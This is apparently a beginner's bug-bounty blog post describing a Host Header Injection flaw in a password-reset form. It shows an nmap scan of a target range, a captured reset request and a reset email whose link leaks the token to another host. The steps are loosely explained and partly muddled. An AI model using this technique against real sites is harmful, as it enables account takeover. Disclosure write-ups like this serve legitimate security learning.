How I able to steal password reset token of any user. with severity : “P2”

Abhishek Morla
2 min readJan 8, 2021

Hey I’m abhishekmorla, just a beginner in bug hunting.

Here we go:

This article is about a vulnerability (Host Header Injection). I was able to find in the BugCrowd private program. the scope was amazing its range of IP 2xx.xxx.xx.xxx/28

so i quickly scan the range with nmap :

“ nmap -p80 2xx.xxx.xx.xxx/28 -oG — | grep 80/open “

and the result were :
Host: 2xx.xxx.xx.xx1 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx2 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx3 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx4 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx5 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx6 () Ports: 80/open/tcp//http///

I open up some above ips into my browser and one of it redirect to login page. then I clicked on reset password page, where i entered the victim email address.

Post Request:

POST /passwords/forgot HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close

Cookie: _ga=GA1.2.2543534.34543563; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.467456.1568844739; ei_client_id=13423rf46534g…….

I entered the victim’s email and captured the request in Burp. By changing the host to mysite.com, Victim will receive an email with the password reset link.

Response:

HTTP/1.0 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 18 Sep 2020 14:20:51 GMT
Location: https://mysite.com
Server: nginx
Connection: close

That email contains password reset token (shown below) , when victim will click, Attacker can able to get the token, thus resetting the password.

Email

Click on the following link to reset your password:

http://www.mysite.com/passwords/forgot/a248d8b06e7b25a116851234f454yt0d9fb197dadc04f30185512eecc811

Email

and by this way The victim will receive the malicious link in their email, and, when they clicked, will leak the user’s password reset link / token to the attacker(mysite.com) site, leading to full account takeover.

thanks for reading !

LinkedIn : https://www.linkedin.com/in/abhishekmorla/

twitter : https://twitter.com/abhishekmorla

--

--

Abhishek Morla

Security Consultant | CSE Student | Synack Red Team & Yogosha Member | Detectify Crowdsource Member | Prohacker at HacktheBox | 40+ Hall of fame